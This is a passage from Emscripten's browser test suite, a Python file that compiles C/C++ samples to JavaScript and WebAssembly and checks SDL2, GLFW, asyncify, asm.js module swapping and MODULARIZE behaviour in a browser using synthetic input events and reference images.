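# plus the packaged test.data) were moved into sub/, so a successful load shows that locateFile()
# from pre.js was consulted for each of those requests.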
self.run_browser('page.html', None, '/report_result?1')
# alternatively, put locateFile in the HTML
print('in html')
create_test_file('shell.html', '''
<body>
<script>
var Module = {
locateFile: function(x) { return "sub/" + x }
};
</script>
{{{ SCRIPT }}}
</body>
''')
def in_html(expected, args=[]):
self.compile_btest(['src.cpp', '-O2', '-g', '--shell-file', 'shell.html', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'SAFE_HEAP=1', '-s', 'ASSERTIONS=1', '-s', 'FORCE_FILESYSTEM=1', '-s', 'WASM=' + str(wasm)] + args)
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
self.run_browser('page.html', None, '/report_result?' + expected)
in_html('1')
# verify that the mem init request succeeded in the latter case
if not wasm:
create_test_file('src.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
int result = EM_ASM_INT({
return Module['memoryInitializerRequest'].status;
});
printf("memory init request: %d\n", result);
REPORT_RESULT(result);
return 0;
}
'''))
in_html('200')
@requires_graphics_hardware
def test_glfw3(self):
for opts in [[], ['-s', 'LEGACY_GL_EMULATION=1'], ['-Os', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'glfw3.c'), args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'] + opts, expected='1')
@requires_graphics_hardware
def test_glfw_events(self):
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=2', "-DUSE_GLFW=2", '-lglfw', '-lGL'], expected='1')
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=3', "-DUSE_GLFW=3", '-lglfw', '-lGL'], expected='1')
@no_wasm_backend('asm.js')
def test_asm_swapping(self):
self.clear()
create_test_file('run.js', r'''
Module['onRuntimeInitialized'] = function() {
// test proper initial result
var result = Module._func();
console.log('first: ' + result);
if (result !== 10) throw 'bad first result';
// load second module to be swapped in
var second = document.createElement('script');
second.onload = function() { console.log('loaded second') };
second.src = 'second.js';
document.body.appendChild(second);
console.log('second appended');
Module['onAsmSwap'] = function() {
console.log('swapped');
// verify swapped-in result
var result = Module._func();
console.log('second: ' + result);
if (result !== 22) throw 'bad second result';
Module._report(999);
console.log('reported');
};
};
''')
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2']]:
print(opts)
opts += ['-s', 'WASM=0', '--pre-js', 'run.js', '-s', 'SWAPPABLE_ASM_MODULE=1'] # important that both modules are built with the same opts
create_test_file('second.cpp', self.with_report_result(open(path_from_root('tests', 'asm_swap2.cpp')).read()))
self.compile_btest(['second.cpp'] + opts)
run_process([PYTHON, path_from_root('tools', 'distill_asm.py'), 'a.out.js', 'second.js', 'swap-in'])
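# distill_asm.py (invoked with 'swap-in') presumably rewrites second.js into a form that can be
# swapped into the already-running module; run.js above waits for Module['onAsmSwap'] and then
# re-invokes _func() to check that the swapped-in code returns 22 instead of 10.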
self.assertExists('second.js')
if SPIDERMONKEY_ENGINE in JS_ENGINES:
out = run_js('second.js', engine=SPIDERMONKEY_ENGINE, stderr=PIPE, full_output=True, assert_returncode=None)
self.validate_asmjs(out)
else:
print('Skipping asm validation check, spidermonkey is not configured')
self.btest(path_from_root('tests', 'asm_swap.cpp'), args=opts, expected='999')
@requires_graphics_hardware
def test_sdl2_image(self):
# load an image file and get pixel data; also gives -O2 coverage for --preload-file and the memory init file
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
create_test_file('sdl2_image.c', self.with_report_result(open(path_from_root('tests', 'sdl2_image.c')).read()))
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
'sdl2_image.c', '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpeg')
create_test_file('sdl2_image_jpeg.c', self.with_report_result(open(path_from_root('tests', 'sdl2_image.c')).read()))
self.compile_btest([
'sdl2_image_jpeg.c', '-o', 'page.html',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_formats(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl2_image.c', expected='512', args=['--preload-file', 'screenshot.png', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.png"',
'-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["png"]'])
self.btest('sdl2_image.c', expected='600', args=['--preload-file', 'screenshot.jpg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpg"',
'-DBITSPERPIXEL=24', '-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["jpg"]'])
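# Test SDL2 keyboard input, driving the page with synthetic keydown/keypress/keyup events from pre.js.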
def test_sdl2_key(self):
for defines in [[]]:
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
var prevented = !document.dispatchEvent(event);
//send keypress if not prevented
if (!prevented) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
create_test_file('sdl2_key.c', self.with_report_result(open(path_from_root('tests', 'sdl2_key.c')).read()))
self.compile_btest(['sdl2_key.c', '-o', 'page.html'] + defines + ['-s', 'USE_SDL=2', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']'''])
self.run_browser('page.html', '', '/report_result?37182145')
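# Test SDL2 text input, dispatching synthetic keypress events to document.body from pre.js.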
def test_sdl2_text(self):
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
create_test_file('sdl2_text.c', self.with_report_result(open(path_from_root('tests', 'sdl2_text.c')).read()))
self.compile_btest(['sdl2_text.c', '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
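# Test SDL2 mouse input, simulating mousedown/mouseup/mousemove events on the canvas.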
@requires_graphics_hardware
def test_sdl2_mouse(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('sdl2_mouse.c', self.with_report_result(open(path_from_root('tests', 'sdl2_mouse.c')).read()))
self.compile_btest(['sdl2_mouse.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
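# Like test_sdl2_mouse, but the canvas sits inside an offset container (-DTEST_SDL_MOUSE_OFFSETS=1),
# checking that mouse coordinates account for the canvas position.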
@requires_graphics_hardware
def test_sdl2_mouse_offsets(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl2_mouse.js"></script>
</body>
</html>
''')
create_test_file('sdl2_mouse.c', self.with_report_result(open(path_from_root('tests', 'sdl2_mouse.c')).read()))
self.compile_btest(['sdl2_mouse.c', '-DTEST_SDL_MOUSE_OFFSETS=1', '-O2', '--minify', '0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
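# Test SDL2 together with pthreads (PROXY_TO_PTHREAD).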
@requires_threads
def test_sdl2_threads(self):
self.btest('sdl2_threads.c', expected='4', args=['-s', 'USE_PTHREADS=1', '-s', 'USE_SDL=2', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_graphics_hardware
def test_sdl2glshader(self):
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '--closure', '1', '-g1', '-s', 'LEGACY_GL_EMULATION=1'])
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True) # XXX closure fails on proxy
@requires_graphics_hardware
def test_sdl2_canvas_blank(self):
self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_palette(self):
self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_twice(self):
self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gfx(self):
self.btest('sdl2_gfx.cpp', args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_GFX=2'], reference='sdl2_gfx.png', reference_slack=2)
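# Test paletted canvas rendering; the -r/-g/-b color choice is passed in via Module['arguments'] from a pre-js.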
@requires_graphics_hardware
def test_sdl2_canvas_palette_2(self):
create_test_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_test_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_test_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-r.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-g.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-b.js'])
def test_sdl2_swsurface(self):
self.btest('sdl2_swsurface.c', expected='1', args=['-s', 'USE_SDL=2', '-s', 'TOTAL_MEMORY=64MB'])
@requires_graphics_hardware
def test_sdl2_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
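# Test SDL2 canvas rendering proxied to a worker; the injected page script waits for rAFs to arrive before running the reftest.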
@requires_graphics_hardware
def test_sdl2_canvas_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_test_file('test.html', html)
create_test_file('data.txt', 'datum')
self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-s', 'USE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-s', 'GL_TESTING=1'], manual_reference=True, post_build=post)
def test_sdl2_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_test_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
def test_sdl2_timer(self):
self.btest('sdl2_timer.c', expected='5', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_size(self):
self.btest('sdl2_canvas_size.c', expected='1', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_read(self):
# SDL, OpenGL, readPixels
create_test_file('sdl2_gl_read.c', self.with_report_result(open(path_from_root('tests', 'sdl2_gl_read.c')).read()))
self.compile_btest(['sdl2_gl_read.c', '-o', 'something.html', '-s', 'USE_SDL=2'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_unwasteful(self):
self.btest('sdl2_unwasteful.cpp', expected='1', args=['-s', 'USE_SDL=2', '-O1'])
def test_sdl2_canvas_write(self):
self.btest('sdl2_canvas_write.cpp', expected='0', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_frames_swap(self):
def post_build(*args):
self.post_manual_reftest(*args)
html = open('test.html').read()
html2 = html.replace('''Module['postRun'] = doReftest;''', '') # we don't want the very first frame
assert html != html2
create_test_file('test.html', html2)
self.btest('sdl2_gl_frames_swap.c', reference='sdl2_gl_frames_swap.png', args=['--proxy-to-worker', '-s', 'GL_TESTING=1', '-s', 'USE_SDL=2'], manual_reference=True, post_build=post_build)
@requires_graphics_hardware
def test_sdl2_ttf(self):
shutil.copy2(path_from_root('tests', 'freetype', 'LiberationSansBold.ttf'), self.get_dir())
self.btest('sdl2_ttf.c', reference='sdl2_ttf.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'LiberationSansBold.ttf'],
message='You should see colorful "hello" and "world" in the window')
def test_sdl2_custom_cursor(self):
shutil.copyfile(path_from_root('tests', 'cursor.bmp'), 'cursor.bmp')
self.btest('sdl2_custom_cursor.c', expected='1', args=['--preload-file', 'cursor.bmp', '-s', 'USE_SDL=2'])
def test_sdl2_misc(self):
self.btest('sdl2_misc.c', expected='1', args=['-s', 'USE_SDL=2'])
print('also test building to object files first')
src = open(path_from_root('tests', 'sdl2_misc.c')).read()
create_test_file('test.c', self.with_report_result(src))
run_process([PYTHON, EMCC, 'test.c', '-s', 'USE_SDL=2', '-o', 'test.o'])
self.compile_btest(['test.o', '-s', 'USE_SDL=2', '-o', 'test.html'])
self.run_browser('test.html', '...', '/report_result?1')
@requires_sound_hardware
def test_sdl2_mixer(self):
shutil.copyfile(path_from_root('tests', 'sounds', 'alarmvictory_1.ogg'), 'sound.ogg')
self.btest('sdl2_mixer.c', expected='1', args=['--preload-file', 'sound.ogg', '-s', 'USE_SDL=2', '-s', 'USE_SDL_MIXER=2', '-s', 'TOTAL_MEMORY=33554432'])
@requires_sound_hardware
def test_sdl2_mixer_wav(self):
shutil.copyfile(path_from_root('tests', 'sounds', 'the_entertainer.wav'), 'sound.wav')
self.btest('sdl2_mixer_wav.c', expected='1', args=['--preload-file', 'sound.wav', '-s', 'USE_SDL=2', '-s', 'USE_SDL_MIXER=2', '-s', 'TOTAL_MEMORY=33554432'])
@no_wasm_backend('cocos2d needs to be ported')
@requires_graphics_hardware
def test_cocos2d_hello(self):
cocos2d_root = os.path.join(system_libs.Ports.get_build_dir(), 'cocos2d')
preload_file = os.path.join(cocos2d_root, 'samples', 'HelloCpp', 'Resources') + '@'
self.btest('cocos2d_hello.cpp', reference='cocos2d_hello.png', reference_slack=1,
args=['-s', 'USE_COCOS2D=3', '-s', 'ERROR_ON_UNDEFINED_SYMBOLS=0', '--std=c++11', '--preload-file', preload_file, '--use-preload-plugins'],
message='You should see Cocos2d logo')
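# Test async sleeping (browser/async.cpp) at several optimization levels, using the suite's default async args.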
def test_async(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('browser/async.cpp', '1', args=['-O' + str(opts), '-g2'] + self.get_async_args())
@no_fastcomp('emterpretify is not compatible with threads')
@requires_threads
def test_async_in_pthread(self):
self.btest('browser/async.cpp', '1', args=self.get_async_args() + ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-g'])
def test_async_2(self):
# Error.stackTraceLimit defaults to 10 in Chrome, but this test relies on more
# than 40 stack frames being reported.
create_test_file('pre.js', 'Error.stackTraceLimit = 80;\n')
self.btest('browser/async_2.cpp', '40', args=['-O3', '--pre-js', 'pre.js'] + self.get_async_args())
def test_async_virtual(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_virtual.cpp', '5', args=['-O' + str(opts), '-profiling'] + self.get_async_args())
def test_async_virtual_2(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_virtual_2.cpp', '1', args=['-O' + str(opts), '-s', 'ASSERTIONS=1', '-s', 'SAFE_HEAP=1', '-profiling'] + self.get_async_args())
# Test async sleeps in the presence of invoke_* calls, which can happen with
# longjmp or exceptions.
@parameterized({
'O0': ([],), # noqa
'O3': (['-O3'],), # noqa
})
def test_async_longjmp(self, args):
self.btest('browser/async_longjmp.cpp', '2', args=args + self.get_async_args())
@no_wasm_backend('emterpretify, with emterpreter-specific error logging')
def test_emterpreter_async_bad(self):
for opts in [0, 3]:
print(opts)
self.btest('emterpreter_async_bad.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_middle"]', '-s', 'ASSERTIONS=1'])
@no_wasm_backend('emterpretify, with emterpreter-specific error logging')
def test_emterpreter_async_bad_2(self):
for opts in [0, 3]:
for assertions in [0, 1]:
# without assertions, we end up continuing to run more non-emterpreted code in this testcase, returning 1
# with assertions, we hit the emterpreter-async assertion on that, and report a clear error
expected = '2' if assertions else '1'
print(opts, assertions, expected)
self.btest('emterpreter_async_bad_2.cpp', expected, args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_middle"]', '-s', 'ASSERTIONS=%s' % assertions, '-g'])
def test_async_mainloop(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_mainloop.cpp', '121', args=['-O' + str(opts)] + self.get_async_args())
@no_wasm_backend('emterpretify - specific behavior wrt other async calls being paused or not')
def test_emterpreter_async_with_manual(self):
for opts in [0, 3]:
print(opts)
self.btest('emterpreter_async_with_manual.cpp', '121', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_acall"]'])
@no_wasm_backend('emterpretify - yielding behavior')
def test_emterpreter_async_sleep2(self):
self.btest('emterpreter_async_sleep2.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Oz'])
@no_wasm_backend('emterpretify - safe-heap specific issues')
def test_emterpreter_async_sleep2_safeheap(self):
# check that safe-heap machinery does not cause errors in async operations
self.btest('emterpreter_async_sleep2_safeheap.cpp', '17', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Oz', '-profiling', '-s', 'SAFE_HEAP=1', '-s', 'ASSERTIONS=1', '-s', 'EMTERPRETIFY_WHITELIST=["_main","_callback","_fix"]', '-s', 'EXIT_RUNTIME=1'])
@no_wasm_backend('emterpretify - yield-specific')
@requires_sound_hardware
def test_sdl_audio_beep_sleep(self):
self.btest('sdl_audio_beep_sleep.cpp', '1', args=['-Os', '-s', 'ASSERTIONS=1', '-s', 'DISABLE_EXCEPTION_CATCHING=0', '-profiling', '-s', 'SAFE_HEAP=1', '-lSDL'] + self.get_async_args(), timeout=90)
def test_mainloop_reschedule(self):
self.btest('mainloop_reschedule.cpp', '1', args=['-Os'] + self.get_async_args())
def test_mainloop_infloop(self):
self.btest('mainloop_infloop.cpp', '1', args=self.get_async_args())
def test_async_iostream(self):
self.btest('browser/async_iostream.cpp', '1', args=self.get_async_args())
# Test an async return value. The value goes through a custom JS library
# method that uses asyncify, and therefore it needs to be declared in
# ASYNCIFY_IMPORTS.
# To make the test more precise we also use ASYNCIFY_IGNORE_INDIRECT here.
@parameterized({
'normal': (['-s', 'ASYNCIFY_IMPORTS=["sync_tunnel"]'],), # noqa
'nothing': (['-DBAD'],), # noqa
'empty_list': (['-DBAD', '-s', 'ASYNCIFY_IMPORTS=[]'],), # noqa
})
@no_fastcomp('emterpretify never worked here')
def test_async_returnvalue(self, args):
self.btest('browser/async_returnvalue.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_IGNORE_INDIRECT', '--js-library', path_from_root('tests', 'browser', 'async_returnvalue.js')] + args + ['-s', 'ASSERTIONS=1'])
@no_fastcomp('wasm backend asyncify specific')
def test_async_stack_overflow(self):
self.btest('browser/async_stack_overflow.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_STACK_SIZE=4'])
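# Test -s MODULARIZE=1 across optimization levels, covering several EXPORT_NAME values and module-instantiation patterns (see the inline cases below).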
@requires_sync_compilation
def test_modularize(self):
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure', '1']]:
for args, code in [
([], 'Module();'), # defaults
# use EXPORT_NAME
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
if (typeof Module !== "undefined") throw "what?!"; // do not pollute the global scope, we are modularized!
HelloWorld.noInitialRun = true; // erroneous module capture will load this and cause a timeout
HelloWorld();
'''),
# pass in a Module option (which prevents main(), which we then invoke ourselves)
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
var hello = HelloWorld({ noInitialRun: true, onRuntimeInitialized: function() {
setTimeout(function() { hello._main(); }); // must be async, because onRuntimeInitialized may be called synchronously, so |hello| is not yet set!
} });
'''),
# similar, but without a mem init file, everything is sync and simple
(['-s', 'EXPORT_NAME="HelloWorld"', '--memory-init-file', '0'], '''
var hello = HelloWorld({ noInitialRun: true});
hello._main();
'''),
# use the then() API
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
HelloWorld({ noInitialRun: true }).then(function(hello) {
hello._main();
});
'''),
# then() API, also note the returned value
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
var helloOutside = HelloWorld({ noInitialRun: true }).then(function(hello) {
setTimeout(function() {
hello._main();
if (hello !== helloOutside) throw 'helloOutside has not been set!'; // as we are async, helloOutside must have been set
});
});
'''),
]:
print('test on', opts, args, code)
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
create_test_file('test.c', self.with_report_result(src))
# this test is synchronous, so avoid async startup due to wasm features
self.compile_btest(['test.c', '-s', 'MODULARIZE=1', '-s', 'WASM_ASYNC_COMPILATION=0', '-s', 'SINGLE_FILE=1'] + args + opts)
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
%s
</script>
''' % code)
self.run_browser('a.html', '...', '/report_result?0')
# Test illustrating the regression in the modularize feature introduced in commit c5af8f6
# when compiling with the --preload-file option.
@no_wasm_backend('cannot customize TOTAL_MEMORY in wasm at runtime')
def test_modularize_and_preload_files(self):
# amount of memory to allocate for the emscripten heap, different from the default
totalMemory = 33554432
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure', '1']]:
# the main function simply checks that the amount of allocated heap memory is correct
src = r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
EM_ASM({
// use bracket access on Module so the test still succeeds when closure compiler is enabled
var totalMemory = Module['TOTAL_MEMORY'];
assert(totalMemory === %d, 'bad memory size');
});
REPORT_RESULT(0);
return 0;
}
''' % totalMemory
create_test_file('test.c', self.with_report_result(src))
# generate a dummy file
create_test_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
# no wasm, since this tests customizing total memory at runtime
self.compile_btest(['test.c', '-s', 'WASM=0', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts)
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
// instantiate the Foo module with custom TOTAL_MEMORY value
var foo = Foo({ TOTAL_MEMORY: %d });
</script>
''' % totalMemory)
self.run_browser('a.html', '...', '/report_result?0')
def test_webidl(self):
# see original in test_core.py
run_process([PYTHON, path_from_root('tools', 'webidl_binder.py'),
